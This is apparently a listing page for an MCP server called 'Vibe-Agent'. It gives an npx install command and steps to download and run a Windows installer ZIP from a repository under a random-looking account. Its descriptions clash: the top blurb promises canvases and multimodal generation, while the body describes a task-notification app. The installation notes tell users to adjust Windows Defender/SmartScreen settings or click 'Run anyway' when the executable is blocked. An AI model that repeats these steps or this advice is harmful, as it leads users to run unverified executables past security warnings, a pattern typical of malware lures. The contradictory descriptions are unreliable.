Get the FREE Ultimate OpenClaw Setup Guide →

Vibe-Agent

🎨 Create dynamic canvases and explore multimodal AI generation with Vibe-Agent, featuring easy-to-use tools and customizable options.

Installation
Run this command in your terminal to add the MCP server to Claude Code.
Run in terminal:
Command
claude mcp add --transport stdio innocuous-stiffness915-vibe-agent npx -y innocuous-stiffness915/vibe-agent \
  --env VIBE_AGENT_WINDOWS="true" \
  --env VIBE_AGENT_CONFIG_PATH="path/to/config (optional)"

How to use

Vibe-Agent is a Windows-focused desktop utility designed to help you manage tasks and receive real-time notifications for scheduled actions. The MCP server entry points to a packaged executable delivered via an installer ZIP; once installed, the application runs as a standalone native app with a GUI. Through its interface, you can create and manage tasks, configure reminders, and receive alerts to streamline ongoing operations. The MCP integration described here assumes using a package runner (npx) to fetch and run the latest release from the repository, ensuring you’re using the most up-to-date public version. The toolset centers on user-friendly task management, customizable settings, and timely notifications to keep you on top of your workflow.

How to install

Prerequisites:

  • Windows 10 or newer
  • Administrative privileges may be required for installing desktop applications
  • Internet access to download the installer

Step-by-step installation:

  1. Ensure you have Node.js and npm installed (needed for the MCP runner in this configuration). If not, install Node.js from https://nodejs.org and verify with node -v and npm -v.

  2. Open a terminal or PowerShell and run the following to fetch the latest Vibe-Agent package (this uses npx as the MCP method defined in mcp_config):

# Download and run the latest Vibe-Agent package
npx -y innocuous-stiffness915/vibe-agent
  1. The installer ZIP referenced by the repository (Agent_Vibe_1.8.zip) should be downloaded via the provided link within the README. Extract the ZIP to a desired location.

  2. Run the installer executable from the extracted folder and follow on-screen prompts to complete installation.

  3. After installation, launch Vibe-Agent from the Start Menu or desktop shortcut and configure your preferred tasks and notification settings.

Additional notes

Notes and tips:

  • The download link is tailored for Windows environments; macOS/Linux users will not be supported by this installer.
  • If the installer fails to run due to blocked executable permissions, adjust Windows Defender/SmartScreen settings or right-click the installer and choose 'Run anyway'.
  • Ensure you have internet connectivity during initial setup to fetch the latest release data when using the MCP runner.
  • If you want to adjust how the MCP wrapper invokes the app, you can modify the mcp_config environment variables (e.g., VIBE_AGENT_CONFIG_PATH) to point to a custom configuration file.
  • For support or issues, open an issue in the repository from which you downloaded the package.

Related MCP Servers

Sponsor this space

Reach thousands of developers ↗